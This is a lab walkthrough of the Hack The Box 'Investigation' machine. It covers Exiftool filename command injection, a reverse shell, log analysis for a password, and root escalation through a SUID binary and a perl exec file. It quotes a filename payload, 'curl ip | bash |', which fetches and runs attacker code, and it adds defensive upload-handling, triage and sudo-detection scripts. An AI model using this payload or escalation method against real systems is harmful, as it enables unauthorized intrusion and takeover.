In this post, I would like to share a walkthrough of the Investigation machine from Hack The Box.
This machine is rated Insane on Hack The Box.

What will you gain from the Investigation machine?
For the user flag, you need to abuse a website that accepts a user-uploaded image and runs Exiftool on it; the site uses an older version of Exiftool that is vulnerable to command injection.
As for the root flag, you need to find Windows Event logs on the machine and analyse them to obtain a password, which is then used with the malware that runs as root.
Information Gathering on Investigation Machine
Once we have started the VPN connection (the VPN file is downloaded from Hack The Box), we can begin information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

Let’s access the website interface.

However, the website doesn’t have much to explore.


From browsing around, the only thing we learn is a potential username.

However, there’s an upload function in the Free Service section.

Let’s find a jpg file and upload it to the application.


As shown in the screenshot above, we have uploaded the jpg file to the application.
Exiftool vulnerability

I noticed that the Exiftool version in use is vulnerable, and the exploit can be found here.


We can copy the jpg file to a filename that contains the command injection, which will curl a file from our attacker’s machine.

Let’s start our Python server.

We can also put the reverse shell into a new file saved in HTML format.

Let’s start our listener with pwncat.

Then, let’s upload the file named curl ip | bash |

The Burp Suite request will look something like the above.

Once the file is successfully uploaded to the application, we will be getting the output as shown above.

When we look back at the Python server, it shows that the application is retrieving our HTML file.

Boom! We managed to obtain the reverse shell connection back to us.
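The injection above works because a user-supplied filename containing shell metacharacters (here one ending in |) reached the metadata tool unchanged. The following is an added example of the defensive fix, written for this post; it is not code from the original walkthrough, from Hack The Box, or from the Exiftool project. It assumes a Python upload handler with a hypothetical storage directory /var/uploads and an exiftool binary on PATH: the server chooses the stored filename itself (the user's name only contributes an allowlisted extension), every name is checked against a strict character set, and exiftool is invoked with an argv list so no shell is involved.

```python
import re
import secrets
import subprocess
from pathlib import Path

# Constructed sample: the upload name used in the walkthrough above.
SAMPLE_MALICIOUS_NAME = "curl ip | bash |"

# Assumed storage location for this example (not the machine's real path).
UPLOAD_DIR = Path("/var/uploads")
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Only letters, digits, underscore, dot and hyphen: no spaces, pipes, quotes, etc.
_SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_.-]+$")


class UnsafeUploadName(ValueError):
    """Raised when an upload name or stored path fails validation."""


def extension_of(user_name: str) -> str:
    """Lower-cased extension of the user-supplied name, without the dot ('' if none)."""
    return Path(user_name).suffix.lower().lstrip(".")


def choose_storage_name(user_name: str) -> str:
    """Server-chosen filename: random hex plus an allowlisted extension.

    The user's original name never becomes part of the stored path, so a
    name such as 'curl ip | bash |' cannot reach any tool that opens the file.
    """
    ext = extension_of(user_name)
    if ext not in ALLOWED_EXTENSIONS:
        raise UnsafeUploadName(f"extension not allowed: {ext!r}")
    return f"{secrets.token_hex(16)}.{ext}"


def is_safe_name(name: str) -> bool:
    """True only if the basename uses the restricted character set."""
    return bool(_SAFE_NAME_RE.match(name)) and "/" not in name and name not in (".", "..")


def exiftool_argv(stored_path: str) -> list:
    """Build the argv list for exiftool; refuses anything outside UPLOAD_DIR
    or with a non-conforming basename. No shell is ever involved."""
    p = Path(stored_path)
    if p.parent != UPLOAD_DIR or not is_safe_name(p.name):
        raise UnsafeUploadName(f"refusing to process {stored_path!r}")
    return ["exiftool", "-json", str(p)]


def run_exiftool(stored_path: str) -> subprocess.CompletedProcess:
    """Run exiftool on a validated stored file (assumes exiftool is installed)."""
    return subprocess.run(
        exiftool_argv(stored_path),
        capture_output=True,
        text=True,
        timeout=30,
        check=False,
    )


if __name__ == "__main__":
    # Demonstrates the rejection of the walkthrough's filename without touching disk.
    try:
        choose_storage_name(SAMPLE_MALICIOUS_NAME)
    except UnsafeUploadName as exc:
        print("rejected:", exc)
    print("stored as:", choose_storage_name("holiday.JPG"))
```

Updating Exiftool to a fixed release is still required; the handler above only ensures that a user-controlled string never reaches the tool as a path in the first place.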

We notice that the only user available on the machine is smorton.


Let’s upload pspy64 to the victim machine to see whether there is any process we can abuse.

We should give the file execute permission and run it.


From the pspy64 output, I notice a path that looks suspicious, which is /var/www/html.


Let’s access the folder to see what is stored inside.

There’s nothing saved inside the analysed_log file.

It’s hard to read when you run strings on the file content.

The msg file is a CDFV2 Microsoft Outlook Message.


Therefore, we should convert the msg file to the eml file format.

We can read the content of the file by opening it in either Outlook or LibreOffice.



Next, we unzip the attached file and manage to find a password among all that information.
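Opening the converted message in a mail client works, but the same triage (read the headers, pull out the attachment, list what is inside the archive, and grep the extracted text) can be scripted with the Python standard library. The block below is an added example written for this post, not code from the walkthrough; it builds a constructed .eml with a constructed zip attachment in memory so it runs offline, and the sample contents stand in for the machine's real message, which the post does not reproduce.

```python
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser


def build_sample_eml() -> bytes:
    """Constructed stand-in for the converted .eml: a short body plus a zip attachment."""
    archive = io.BytesIO()
    with zipfile.ZipFile(archive, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(
            "constructed_log.txt",
            "constructed sample log line 1\n"
            "constructed sample log line 2\n"
            "Password reset requested for CONSTRUCTED_USER\n",
        )
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "smorton@example.invalid"
    msg["Subject"] = "Logs (constructed sample)"
    msg.set_content("Attached are the logs.")
    msg.add_attachment(
        archive.getvalue(), maintype="application", subtype="zip", filename="logs.zip"
    )
    return msg.as_bytes()


def summarize_headers(eml_bytes: bytes) -> dict:
    """Return the headers an analyst looks at first."""
    msg = BytesParser(policy=policy.default).parsebytes(eml_bytes)
    return {name: str(msg[name]) for name in ("From", "To", "Subject")}


def extract_attachments(eml_bytes: bytes) -> dict:
    """Map attachment filename -> decoded bytes (base64 handled by the parser)."""
    msg = BytesParser(policy=policy.default).parsebytes(eml_bytes)
    return {part.get_filename(): part.get_payload(decode=True) for part in msg.iter_attachments()}


def zip_members(data: bytes) -> dict:
    """Map member name -> bytes for an in-memory zip archive."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}


def find_credential_lines(text: str) -> list:
    """Lines worth a closer look when hunting for a password in extracted text."""
    return [line for line in text.splitlines() if "password" in line.lower()]


if __name__ == "__main__":
    eml = build_sample_eml()
    print(summarize_headers(eml))
    for name, blob in extract_attachments(eml).items():
        print("attachment:", name, len(blob), "bytes")
        for member, content in zip_members(blob).items():
            print("  member:", member)
            for hit in find_credential_lines(content.decode("utf-8", "replace")):
                print("    candidate:", hit)
```

The .msg to .eml conversion itself is left to the external tool used in the post; this script starts from the .eml.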



We can read the user flag by typing the “cat user.txt” command
Escalating to Root Privileges

As usual, we check for binaries we are allowed to run with elevated privileges by running the command “sudo -l”.

We can analyse the SUID binary with IDA Pro or Ghidra, but I will just use strings to pull the useful information out of the file.

Let’s create a perl file containing exec(“any command”).

Let’s execute the SUID binary with the perl file and the passcode.


We can read the root flag by typing the “cat root.txt” command
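The root step relies on a privileged binary accepting a script path from the unprivileged user, so the thing to monitor is the argument list of sudo commands, not just the binary itself. The following is an added detection example written for this post (not the machine's configuration or any Hack The Box material) that parses constructed auth.log sudo lines and flags invocations whose arguments are script files in user-writable locations. The binary name and passcode in the sample lines are placeholders because the post does not reproduce them.

```python
import re

# Constructed sample auth.log lines. PLACEHOLDER_BINARY and PLACEHOLDER_PASSCODE
# stand in for the real values, which this walkthrough does not quote.
SAMPLE_AUTH_LOG = """\
Jan  1 10:00:01 host sudo:  smorton : TTY=pts/0 ; PWD=/home/smorton ; USER=root ; COMMAND=/usr/bin/apt update
Jan  1 10:00:02 host sudo:  smorton : TTY=pts/0 ; PWD=/home/smorton ; USER=root ; COMMAND=/opt/PLACEHOLDER_BINARY /tmp/payload.pl PLACEHOLDER_PASSCODE
Jan  1 10:00:03 host sudo:  smorton : TTY=pts/0 ; PWD=/home/smorton ; USER=root ; COMMAND=/opt/PLACEHOLDER_BINARY /etc/scripts/report.pl PLACEHOLDER_PASSCODE
"""

# Standard sudo log line layout: user, TTY, PWD, target USER, COMMAND.
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : TTY=(?P<tty>\S+) ; PWD=(?P<pwd>\S+) ; "
    r"USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# Directories an unprivileged user can normally write to.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
# Interpreter-driven file types that a privileged binary might execute verbatim.
SCRIPT_SUFFIXES = (".pl", ".sh", ".py")


def parse_sudo_line(line: str):
    """Return the fields of a sudo log line, or None if it is not one."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None


def suspicious_args(cmd: str) -> list:
    """Arguments that are script files living in user-writable locations."""
    return [
        arg
        for arg in cmd.split()[1:]  # skip the binary itself
        if arg.startswith(SCRATCH_DIRS) and arg.endswith(SCRIPT_SUFFIXES)
    ]


def flag_sudo_events(log_text: str) -> list:
    """Walk a log and collect sudo-to-root invocations that pass a user-writable script."""
    events = []
    for line in log_text.splitlines():
        fields = parse_sudo_line(line)
        if not fields or fields["target"] != "root":
            continue
        reasons = suspicious_args(fields["cmd"])
        if reasons:
            events.append(
                {"user": fields["user"], "cmd": fields["cmd"], "reasons": reasons}
            )
    return events


if __name__ == "__main__":
    for ev in flag_sudo_events(SAMPLE_AUTH_LOG):
        print(f"{ev['user']} ran as root: {ev['cmd']}  <- script in writable dir: {ev['reasons']}")
```

The third sample line is deliberately not flagged: the same binary with a script under a root-owned directory is the intended use, and the hardening that follows from this check is to have the sudo rule pin the script argument to such a path rather than accept an arbitrary one.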
Extra Information
